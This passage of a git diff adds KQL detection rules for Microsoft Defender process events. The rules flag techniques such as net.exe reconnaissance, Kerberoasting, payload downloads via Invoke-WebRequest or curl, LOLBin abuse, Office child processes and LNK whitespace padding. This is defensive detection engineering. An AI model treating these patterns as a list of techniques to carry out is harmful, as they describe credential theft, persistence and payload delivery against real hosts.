--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_group_and_account_reconnaissance_activity_using_net_exe.kql
@@ -0,0 +1,14 @@
+// Title: Suspicious Group And Account Reconnaissance Activity Using Net.EXE
+// Author: Florian Roth (Nextron Systems), omkar72, @svch0st, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2019-01-16
+// Level: medium
+// Description: Detects suspicious reconnaissance command line activity on Windows systems using Net.EXE
+// Check if the user that executed the commands is suspicious (e.g. service accounts, LOCAL_SYSTEM)
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1087.001, attack.t1087.002
+// False Positives:
+//   - Inventory tool runs
+//   - Administrative activity
+
+DeviceProcessEvents
+| where ((FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe") or (ProcessVersionInfoOriginalFileName in~ ("net.exe", "net1.exe"))) and ((((ProcessCommandLine contains "domain admins" or ProcessCommandLine contains " administrator" or ProcessCommandLine contains " administrateur" or ProcessCommandLine contains "enterprise admins" or ProcessCommandLine contains "Exchange Trusted Subsystem" or ProcessCommandLine contains "Remote Desktop Users" or ProcessCommandLine contains "Utilisateurs du Bureau à distance" or ProcessCommandLine contains "Usuarios de escritorio remoto" or ProcessCommandLine contains " /do") and (ProcessCommandLine contains " group " or ProcessCommandLine contains " localgroup ")) and (not(ProcessCommandLine contains " /add"))) or (ProcessCommandLine contains " /do" and ProcessCommandLine contains " accounts "))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_grpconv_execution.kql b/KQL/rules/windows/process_creation/suspicious_grpconv_execution.kql
new file mode 100644
index 00000000..3c376b19
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_grpconv_execution.kql
@@ -0,0 +1,10 @@
+// Title: Suspicious GrpConv Execution
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-05-19
+// Level: high
+// Description: Detects the suspicious execution of a utility to convert Windows 3.x .grp files or for persistence purposes by malicious software or actors
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.t1547
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "grpconv.exe -o" or ProcessCommandLine contains "grpconv -o"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_gup_usage.kql b/KQL/rules/windows/process_creation/suspicious_gup_usage.kql
new file mode 100644
index 00000000..7b2d6fd6
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_gup_usage.kql
@@ -0,0 +1,12 @@
+// Title: Suspicious GUP Usage
+// Author: Florian Roth (Nextron Systems)
+// Date: 2019-02-06
+// Level: high
+// Description: Detects execution of the Notepad++ updater in a suspicious directory, which is often used in DLL side-loading attacks
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.defense-evasion, attack.t1574.001
+// False Positives:
+//   - Execution of tools named GUP.exe and located in folders different than Notepad++\updater
+
+DeviceProcessEvents
+| where FolderPath endswith "\\GUP.exe" and (not(((FolderPath endswith "\\Program Files\\Notepad++\\updater\\GUP.exe" or FolderPath endswith "\\Program Files (x86)\\Notepad++\\updater\\GUP.exe") or (FolderPath contains "\\Users\\" and (FolderPath endswith "\\AppData\\Local\\Notepad++\\updater\\GUP.exe" or FolderPath endswith "\\AppData\\Roaming\\Notepad++\\updater\\GUP.exe")))))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_hh_exe_execution.kql b/KQL/rules/windows/process_creation/suspicious_hh_exe_execution.kql
new file mode 100644
index 00000000..3f6ef8ad
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_hh_exe_execution.kql
@@ -0,0 +1,10 @@
+// Title: Suspicious HH.EXE Execution
+// Author: Maxim Pavlunin
+// Date: 2020-04-01
+// Level: high
+// Description: Detects a suspicious execution of a Microsoft HTML Help (HH.exe)
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.execution, attack.initial-access, attack.t1047, attack.t1059.001, attack.t1059.003, attack.t1059.005, attack.t1059.007, attack.t1218, attack.t1218.001, attack.t1218.010, attack.t1218.011, attack.t1566, attack.t1566.001
+
+DeviceProcessEvents
+| where (ProcessVersionInfoOriginalFileName =~ "HH.exe" or FolderPath endswith "\\hh.exe") and (ProcessCommandLine contains ".application" or ProcessCommandLine contains "\\AppData\\Local\\Temp\\" or ProcessCommandLine contains "\\Content.Outlook\\" or ProcessCommandLine contains "\\Downloads\\" or ProcessCommandLine contains "\\Users\\Public\\" or ProcessCommandLine contains "\\Windows\\Temp\\")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_high_integritylevel_conhost_legacy_option.kql b/KQL/rules/windows/process_creation/suspicious_high_integritylevel_conhost_legacy_option.kql
new file mode 100644
index 00000000..3ba59dad
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_high_integritylevel_conhost_legacy_option.kql
@@ -0,0 +1,12 @@
+// Title: Suspicious High IntegrityLevel Conhost Legacy Option
+// Author: frack113
+// Date: 2022-12-09
+// Level: informational
+// Description: ForceV1 asks for information directly from the kernel space. Conhost connects to the console application. High IntegrityLevel means the process is running with elevated privileges, such as an Administrator context.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1202
+// False Positives:
+//   - Very Likely, including launching cmd.exe via Run As Administrator
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "conhost.exe" and ProcessCommandLine contains "0xffffffff" and ProcessCommandLine contains "-ForceV1") and (ProcessIntegrityLevel in~ ("High", "S-1-16-12288"))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_hwp_sub_processes.kql b/KQL/rules/windows/process_creation/suspicious_hwp_sub_processes.kql
new file mode 100644
index 00000000..ff5f4e12
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_hwp_sub_processes.kql
@@ -0,0 +1,10 @@
+// Title: Suspicious HWP Sub Processes
+// Author: Florian Roth (Nextron Systems)
+// Date: 2019-10-24
+// Level: high
+// Description: Detects suspicious Hangul Word Processor (Hanword) sub processes that could indicate an exploitation
+// MITRE Tactic: Initial Access
+// Tags: attack.initial-access, attack.t1566.001, attack.execution, attack.t1203, attack.t1059.003, attack.g0032
+
+DeviceProcessEvents
+| where FolderPath endswith "\\gbb.exe" and InitiatingProcessFolderPath endswith "\\Hwp.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_iis_module_registration.kql b/KQL/rules/windows/process_creation/suspicious_iis_module_registration.kql
new file mode 100644
index 00000000..b07ae179
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_iis_module_registration.kql
@@ -0,0 +1,12 @@
+// Title: Suspicious IIS Module Registration
+// Author: Florian Roth (Nextron Systems), Microsoft (idea)
+// Date: 2022-08-04
+// Level: high
+// Description: Detects a suspicious IIS module registration as described in Microsoft threat report on IIS backdoors
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.t1505.004
+// False Positives:
+//   - Administrative activity
+
+DeviceProcessEvents
+| where InitiatingProcessFolderPath endswith "\\w3wp.exe" and (ProcessCommandLine contains "appcmd.exe add module" or (ProcessCommandLine contains " system.enterpriseservices.internal.publish" and FolderPath endswith "\\powershell.exe") or (ProcessCommandLine contains "gacutil" and ProcessCommandLine contains " /I"))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_iis_url_globalrules_rewrite_via_appcmd.kql b/KQL/rules/windows/process_creation/suspicious_iis_url_globalrules_rewrite_via_appcmd.kql
new file mode 100644
index 00000000..279b5fc7
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_iis_url_globalrules_rewrite_via_appcmd.kql
@@ -0,0 +1,12 @@
+// Title: Suspicious IIS URL GlobalRules Rewrite Via AppCmd
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-01-22
+// Level: medium
+// Description: Detects usage of "appcmd" to create new global URL rewrite rules. This behaviour has been observed being used by threat actors to add new rules so they can access their webshells.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion
+// False Positives:
+//   - Legitimate usage of appcmd to add new URL rewrite rules
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "set" and ProcessCommandLine contains "config" and ProcessCommandLine contains "section:system.webServer/rewrite/globalRules" and ProcessCommandLine contains "commit:") and (FolderPath endswith "\\appcmd.exe" or ProcessVersionInfoOriginalFileName =~ "appcmd.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_invoke_webrequest_execution.kql b/KQL/rules/windows/process_creation/suspicious_invoke_webrequest_execution.kql
new file mode 100644
index 00000000..6fb90d3f
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_invoke_webrequest_execution.kql
@@ -0,0 +1,10 @@
+// Title: Suspicious Invoke-WebRequest Execution
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-08-02
+// Level: high
+// Description: Detects a suspicious call to Invoke-WebRequest cmdlet where the and output is located in a suspicious location
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1105
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "curl " or ProcessCommandLine contains "Invoke-WebRequest" or ProcessCommandLine contains "iwr " or ProcessCommandLine contains "wget ") and (ProcessCommandLine contains " -ur" or ProcessCommandLine contains " -o") and ((FolderPath endswith "\\powershell_ise.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("powershell_ise.EXE", "PowerShell.EXE", "pwsh.dll"))) and (ProcessCommandLine contains "\\AppData\\" or ProcessCommandLine contains "\\Desktop\\" or ProcessCommandLine contains "\\Temp\\" or ProcessCommandLine contains "\\Users\\Public\\" or ProcessCommandLine contains "%AppData%" or ProcessCommandLine contains "%Public%" or ProcessCommandLine contains "%Temp%" or ProcessCommandLine contains "%tmp%" or ProcessCommandLine contains ":\\Windows\\")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_invoke_webrequest_execution_with_directip.kql b/KQL/rules/windows/process_creation/suspicious_invoke_webrequest_execution_with_directip.kql
new file mode 100644
index 00000000..b41eb155
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_invoke_webrequest_execution_with_directip.kql
@@ -0,0 +1,10 @@
+// Title: Suspicious Invoke-WebRequest Execution With DirectIP
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-04-21
+// Level: medium
+// Description: Detects calls to PowerShell with Invoke-WebRequest cmdlet using direct IP access
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1105
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "curl " or ProcessCommandLine contains "Invoke-RestMethod" or ProcessCommandLine contains "Invoke-WebRequest" or ProcessCommandLine contains " irm " or ProcessCommandLine contains "iwr " or ProcessCommandLine contains "wget ") and ((FolderPath endswith "\\powershell_ise.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("powershell_ise.EXE", "PowerShell.EXE", "pwsh.dll"))) and (ProcessCommandLine contains "://1" or ProcessCommandLine contains "://2" or ProcessCommandLine contains "://3" or ProcessCommandLine contains "://4" or ProcessCommandLine contains "://5" or ProcessCommandLine contains "://6" or ProcessCommandLine contains "://7" or ProcessCommandLine contains "://8" or ProcessCommandLine contains "://9")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_javascript_execution_via_mshta_exe.kql b/KQL/rules/windows/process_creation/suspicious_javascript_execution_via_mshta_exe.kql
new file mode 100644
index 00000000..c61b1951
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_javascript_execution_via_mshta_exe.kql
@@ -0,0 +1,10 @@
+// Title: Suspicious JavaScript Execution Via Mshta.EXE
+// Author: E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community
+// Date: 2019-10-24
+// Level: high
+// Description: Detects execution of javascript code using "mshta.exe".
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218.005
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "javascript" and (FolderPath endswith "\\mshta.exe" or ProcessVersionInfoOriginalFileName =~ "MSHTA.EXE")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_kerberos_ticket_request_via_cli.kql b/KQL/rules/windows/process_creation/suspicious_kerberos_ticket_request_via_cli.kql
new file mode 100644
index 00000000..01f2f7e1
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_kerberos_ticket_request_via_cli.kql
@@ -0,0 +1,15 @@
+// Title: Suspicious Kerberos Ticket Request via CLI
+// Author: Swachchhanda Shrawan Poudel (Nextron Systems)
+// Date: 2025-11-18
+// Level: high
+// Description: Detects suspicious Kerberos ticket requests via command line using System.IdentityModel.Tokens.KerberosRequestorSecurityToken class.
+// Threat actors may use command line interfaces to request Kerberos tickets for service accounts in order to
+// perform offline password cracking attacks commonly known as Kerberoasting or other Kerberos ticket abuse
+// techniques like silver ticket attacks.
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1558.003
+// False Positives:
+//   - Legitimate command line usage by administrators or security tools.
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "System.IdentityModel.Tokens.KerberosRequestorSecurityToken" and ProcessCommandLine contains ".GetRequest()") and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("powershell.exe", "pwsh.dll")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_kernel_dump_using_dtrace.kql b/KQL/rules/windows/process_creation/suspicious_kernel_dump_using_dtrace.kql
new file mode 100644
index 00000000..d6357ace
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_kernel_dump_using_dtrace.kql
@@ -0,0 +1,10 @@
+// Title: Suspicious Kernel Dump Using Dtrace
+// Author: Florian Roth (Nextron Systems)
+// Date: 2021-12-28
+// Level: high
+// Description: Detects suspicious way to dump the kernel on Windows systems using dtrace.exe, which is available on Windows systems since Windows 10 19H1
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1082
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "syscall:::return" and ProcessCommandLine contains "lkd(") or (ProcessCommandLine contains "lkd(0)" and FolderPath endswith "\\dtrace.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_key_manager_access.kql b/KQL/rules/windows/process_creation/suspicious_key_manager_access.kql
new file mode 100644
index 00000000..d9bf2d8d
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_key_manager_access.kql
@@ -0,0 +1,12 @@
+// Title: Suspicious Key Manager Access
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-04-21
+// Level: high
+// Description: Detects the invocation of the Stored User Names and Passwords dialogue (Key Manager)
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1555.004
+// False Positives:
+//   - Administrative activity
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "keymgr" and ProcessCommandLine contains "KRShowKeyMgr") and (FolderPath endswith "\\rundll32.exe" or ProcessVersionInfoOriginalFileName =~ "RUNDLL32.EXE")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_lnk_command_line_padding_with_whitespace_characters.kql b/KQL/rules/windows/process_creation/suspicious_lnk_command_line_padding_with_whitespace_characters.kql
new file mode 100644
index 00000000..d7d713a9
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_lnk_command_line_padding_with_whitespace_characters.kql
@@ -0,0 +1,13 @@
+// Title: Suspicious LNK Command-Line Padding with Whitespace Characters
+// Author: Swachchhanda Shrawan Poudel (Nextron Systems)
+// Date: 2025-03-19
+// Level: high
+// Description: Detects exploitation of LNK file command-line length discrepancy, where attackers hide malicious commands beyond the 260-character UI limit while the actual command-line argument field supports 4096 characters using whitespace padding (e.g., 0x20, 0x09-0x0D).
+// Adversaries insert non-printable whitespace characters (e.g., Line Feed \x0A, Carriage Return \x0D) to pad the visible section of the LNK file, pushing malicious commands past the UI-visible boundary.
+// The hidden payload, executed at runtime but invisible in Windows Explorer properties, enables stealthy execution and evasion—commonly used for social engineering attacks.
+// This rule flags suspicious use of such padding observed in real-world attacks.
+// MITRE Tactic: Initial Access
+// Tags: attack.initial-access, attack.execution, attack.t1204.002
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains "                 " or ProcessCommandLine contains "\\u0009" or ProcessCommandLine contains "\\u000A" or ProcessCommandLine contains "\\u0011" or ProcessCommandLine contains "\\u0012" or ProcessCommandLine contains "\\u0013" or ProcessCommandLine contains "\\u000B" or ProcessCommandLine contains "\\u000C" or ProcessCommandLine contains "\\u000D") or ProcessCommandLine matches regex "\\n\\n\\n\\n\\n\\n") and (InitiatingProcessFolderPath endswith "\\explorer.exe" or InitiatingProcessCommandLine contains ".lnk")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_manipulation_of_default_accounts_via_net_exe.kql b/KQL/rules/windows/process_creation/suspicious_manipulation_of_default_accounts_via_net_exe.kql
new file mode 100644
index 00000000..000c2506
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_manipulation_of_default_accounts_via_net_exe.kql
@@ -0,0 +1,12 @@
+// Title: Suspicious Manipulation Of Default Accounts Via Net.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-09-01
+// Level: high
+// Description: Detects suspicious manipulations of default accounts such as 'administrator' and 'guest'. For example 'enable' or 'disable' accounts or change the password...etc
+// MITRE Tactic: Collection
+// Tags: attack.collection, attack.t1560.001
+// False Positives:
+//   - Some false positives could occur with the admin or guest account. It depends on the scripts being used by the admins in your env. If you experience a lot of FP you could reduce the level to medium
+
+DeviceProcessEvents
+| where (((FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe") or (ProcessVersionInfoOriginalFileName in~ ("net.exe", "net1.exe"))) and ProcessCommandLine contains " user " and (ProcessCommandLine contains " Järjestelmänvalvoja " or ProcessCommandLine contains " Rendszergazda " or ProcessCommandLine contains " Администратор " or ProcessCommandLine contains " Administrateur " or ProcessCommandLine contains " Administrador " or ProcessCommandLine contains " Administratör " or ProcessCommandLine contains " Administrator " or ProcessCommandLine contains " guest " or ProcessCommandLine contains " DefaultAccount " or ProcessCommandLine contains " \"Järjestelmänvalvoja\" " or ProcessCommandLine contains " \"Rendszergazda\" " or ProcessCommandLine contains " \"Администратор\" " or ProcessCommandLine contains " \"Administrateur\" " or ProcessCommandLine contains " \"Administrador\" " or ProcessCommandLine contains " \"Administratör\" " or ProcessCommandLine contains " \"Administrator\" " or ProcessCommandLine contains " \"guest\" " or ProcessCommandLine contains " \"DefaultAccount\" " or ProcessCommandLine contains " 'Järjestelmänvalvoja' " or ProcessCommandLine contains " 'Rendszergazda' " or ProcessCommandLine contains " 'Администратор' " or ProcessCommandLine contains " 'Administrateur' " or ProcessCommandLine contains " 'Administrador' " or ProcessCommandLine contains " 'Administratör' " or ProcessCommandLine contains " 'Administrator' " or ProcessCommandLine contains " 'guest' " or ProcessCommandLine contains " 'DefaultAccount' ")) and (not((ProcessCommandLine contains "guest" and ProcessCommandLine contains "/active no")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_microsoft_office_child_process.kql b/KQL/rules/windows/process_creation/suspicious_microsoft_office_child_process.kql
new file mode 100644
index 00000000..168bfa13
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_microsoft_office_child_process.kql
@@ -0,0 +1,10 @@
+// Title: Suspicious Microsoft Office Child Process
+// Author: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io
+// Date: 2018-04-06
+// Level: high
+// Description: Detects a suspicious process spawning from one of the Microsoft Office suite products (Word, Excel, PowerPoint, Publisher, Visio, etc.)
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.execution, attack.t1047, attack.t1204.002, attack.t1218.010
+
+DeviceProcessEvents
+| where (InitiatingProcessFolderPath endswith "\\EQNEDT32.EXE" or InitiatingProcessFolderPath endswith "\\EXCEL.EXE" or InitiatingProcessFolderPath endswith "\\MSACCESS.EXE" or InitiatingProcessFolderPath endswith "\\MSPUB.exe" or InitiatingProcessFolderPath endswith "\\ONENOTE.EXE" or InitiatingProcessFolderPath endswith "\\POWERPNT.exe" or InitiatingProcessFolderPath endswith "\\VISIO.exe" or InitiatingProcessFolderPath endswith "\\WINWORD.EXE" or InitiatingProcessFolderPath endswith "\\wordpad.exe" or InitiatingProcessFolderPath endswith "\\wordview.exe") and (((ProcessVersionInfoOriginalFileName in~ ("bitsadmin.exe", "CertOC.exe", "CertUtil.exe", "Cmd.Exe", "CMSTP.EXE", "cscript.exe", "curl.exe", "HH.exe", "IEExec.exe", "InstallUtil.exe", "javaw.exe", "Microsoft.Workflow.Compiler.exe", "msdt.exe", "MSHTA.EXE", "msiexec.exe", "Msxsl.exe", "odbcconf.exe", "pcalua.exe", "PowerShell.EXE", "RegAsm.exe", "RegSvcs.exe", "REGSVR32.exe", "RUNDLL32.exe", "schtasks.exe", "ScriptRunner.exe", "wmic.exe", "WorkFolders.exe", "wscript.exe")) or (FolderPath endswith "\\AppVLP.exe" or FolderPath endswith "\\bash.exe" or FolderPath endswith "\\bitsadmin.exe" or FolderPath endswith "\\certoc.exe" or FolderPath endswith "\\certutil.exe" or FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cmstp.exe" or FolderPath endswith "\\control.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\curl.exe" or FolderPath endswith "\\forfiles.exe" or FolderPath endswith "\\hh.exe" or FolderPath endswith "\\ieexec.exe" or FolderPath endswith "\\installutil.exe" or FolderPath endswith "\\javaw.exe" or FolderPath endswith "\\mftrace.exe" or FolderPath endswith "\\Microsoft.Workflow.Compiler.exe" or FolderPath endswith "\\msbuild.exe" or FolderPath endswith "\\msdt.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\msidb.exe" or FolderPath endswith "\\msiexec.exe" or FolderPath endswith "\\msxsl.exe" or FolderPath endswith "\\odbcconf.exe" or FolderPath endswith "\\pcalua.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\regasm.exe" or FolderPath endswith "\\regsvcs.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\schtasks.exe" or FolderPath endswith "\\scrcons.exe" or FolderPath endswith "\\scriptrunner.exe" or FolderPath endswith "\\sh.exe" or FolderPath endswith "\\svchost.exe" or FolderPath endswith "\\verclsid.exe" or FolderPath endswith "\\wmic.exe" or FolderPath endswith "\\workfolders.exe" or FolderPath endswith "\\wscript.exe")) or (FolderPath contains "\\AppData\\" or FolderPath contains "\\Users\\Public\\" or FolderPath contains "\\ProgramData\\" or FolderPath contains "\\Windows\\Tasks\\" or FolderPath contains "\\Windows\\Temp\\" or FolderPath contains "\\Windows\\System32\\Tasks\\"))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_microsoft_onenote_child_process.kql b/KQL/rules/windows/process_creation/suspicious_microsoft_onenote_child_process.kql
new file mode 100644
index 00000000..558923be
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_microsoft_onenote_child_process.kql
@@ -0,0 +1,12 @@
+// Title: Suspicious Microsoft OneNote Child Process
+// Author: Tim Rauch (Nextron Systems), Nasreddine Bencherchali (Nextron Systems), Elastic (idea)
+// Date: 2022-10-21
+// Level: high
+// Description: Detects suspicious child processes of the Microsoft OneNote application. This may indicate an attempt to execute malicious embedded objects from a .one file.
+// MITRE Tactic: Initial Access
+// Tags: attack.t1566, attack.t1566.001, attack.initial-access
+// False Positives:
+//   - File located in the AppData folder with trusted signature
+
+DeviceProcessEvents
+| where InitiatingProcessFolderPath endswith "\\onenote.exe" and (((ProcessCommandLine contains ".hta" or ProcessCommandLine contains ".vb" or ProcessCommandLine contains ".wsh" or ProcessCommandLine contains ".js" or ProcessCommandLine contains ".ps" or ProcessCommandLine contains ".scr" or ProcessCommandLine contains ".pif" or ProcessCommandLine contains ".bat" or ProcessCommandLine contains ".cmd") and FolderPath endswith "\\explorer.exe") or ((ProcessVersionInfoOriginalFileName in~ ("bitsadmin.exe", "CertOC.exe", "CertUtil.exe", "Cmd.Exe", "CMSTP.EXE", "cscript.exe", "curl.exe", "HH.exe", "IEExec.exe", "InstallUtil.exe", "javaw.exe", "Microsoft.Workflow.Compiler.exe", "msdt.exe", "MSHTA.EXE", "msiexec.exe", "Msxsl.exe", "odbcconf.exe", "pcalua.exe", "PowerShell.EXE", "RegAsm.exe", "RegSvcs.exe", "REGSVR32.exe", "RUNDLL32.exe", "schtasks.exe", "ScriptRunner.exe", "wmic.exe", "WorkFolders.exe", "wscript.exe")) or (FolderPath endswith "\\AppVLP.exe" or FolderPath endswith "\\bash.exe" or FolderPath endswith "\\bitsadmin.exe" or FolderPath endswith "\\certoc.exe" or FolderPath endswith "\\certutil.exe" or FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cmstp.exe" or FolderPath endswith "\\control.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\curl.exe" or FolderPath endswith "\\forfiles.exe" or FolderPath endswith "\\hh.exe" or FolderPath endswith "\\ieexec.exe" or FolderPath endswith "\\installutil.exe" or FolderPath endswith "\\javaw.exe" or FolderPath endswith "\\mftrace.exe" or FolderPath endswith "\\Microsoft.Workflow.Compiler.exe" or FolderPath endswith "\\msbuild.exe" or FolderPath endswith "\\msdt.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\msidb.exe" or FolderPath endswith "\\msiexec.exe" or FolderPath endswith "\\msxsl.exe" or FolderPath endswith "\\odbcconf.exe" or FolderPath endswith "\\pcalua.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\regasm.exe" or FolderPath endswith "\\regsvcs.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\schtasks.exe" or FolderPath endswith "\\scrcons.exe" or FolderPath endswith "\\scriptrunner.exe" or FolderPath endswith "\\sh.exe" or FolderPath endswith "\\svchost.exe" or FolderPath endswith "\\verclsid.exe" or FolderPath endswith "\\wmic.exe" or FolderPath endswith "\\workfolders.exe" or FolderPath endswith "\\wscript.exe")) or (FolderPath contains "\\AppData\\" or FolderPath contains "\\Users\\Public\\" or FolderPath contains "\\ProgramData\\" or FolderPath contains "\\Windows\\Tasks\\" or FolderPath contains "\\Windows\\Temp\\" or FolderPath contains "\\Windows\\System32\\Tasks\\")) and (not(((ProcessCommandLine endswith "-Embedding" and FolderPath contains "\\AppData\\Local\\Microsoft\\OneDrive\\" and FolderPath endswith "\\FileCoAuth.exe") or (ProcessCommandLine endswith "-Embedding" and FolderPath endswith "\\AppData\\Local\\Microsoft\\Teams\\current\\Teams.exe"))))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_modification_of_scheduled_tasks.kql b/KQL/rules/windows/process_creation/suspicious_modification_of_scheduled_tasks.kql
new file mode 100644
index 00000000..0d258bb5
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_modification_of_scheduled_tasks.kql
@@ -0,0 +1,12 @@
+// Title: Suspicious Modification Of Scheduled Tasks
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-07-28
+// Level: high
+// Description: Detects when an attacker tries to modify an already existing scheduled tasks to run from a suspicious location
+// Attackers can create a simple looking task in order to avoid detection on creation as it's often the most focused on
+// Instead they modify the task after creation to include their malicious payload
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.execution, attack.t1053.005
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains " /Change " and ProcessCommandLine contains " /TN ") and FolderPath endswith "\\schtasks.exe") and (ProcessCommandLine contains "regsvr32" or ProcessCommandLine contains "rundll32" or ProcessCommandLine contains "cmd /c " or ProcessCommandLine contains "cmd /k " or ProcessCommandLine contains "cmd /r " or ProcessCommandLine contains "cmd.exe /c " or ProcessCommandLine contains "cmd.exe /k " or ProcessCommandLine contains "cmd.exe /r " or ProcessCommandLine contains "powershell" or ProcessCommandLine contains "mshta" or ProcessCommandLine contains "wscript" or ProcessCommandLine contains "cscript" or ProcessCommandLine contains "certutil" or ProcessCommandLine contains "bitsadmin" or ProcessCommandLine contains "bash.exe" or ProcessCommandLine contains "bash " or ProcessCommandLine contains "scrcons" or ProcessCommandLine contains "wmic " or ProcessCommandLine contains "wmic.exe" or ProcessCommandLine contains "forfiles" or ProcessCommandLine contains "scriptrunner" or ProcessCommandLine contains "hh.exe" or ProcessCommandLine contains "hh ") and (ProcessCommandLine contains "\\AppData\\Local\\Temp" or ProcessCommandLine contains "\\AppData\\Roaming\\" or ProcessCommandLine contains "\\Users\\Public\\" or ProcessCommandLine contains "\\WINDOWS\\Temp\\" or ProcessCommandLine contains "\\Desktop\\" or ProcessCommandLine contains "\\Downloads\\" or ProcessCommandLine contains "\\Temporary Internet" or ProcessCommandLine contains "C:\\ProgramData\\" or ProcessCommandLine contains "C:\\Perflogs\\" or ProcessCommandLine contains "%ProgramData%" or ProcessCommandLine contains "%appdata%" or ProcessCommandLine contains "%comspec%" or ProcessCommandLine contains "%localappdata%")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_msbuild_execution_by_uncommon_parent_process.kql b/KQL/rules/windows/process_creation/suspicious_msbuild_execution_by_uncommon_parent_process.kql
new file mode 100644
index 00000000..1b4c62a9
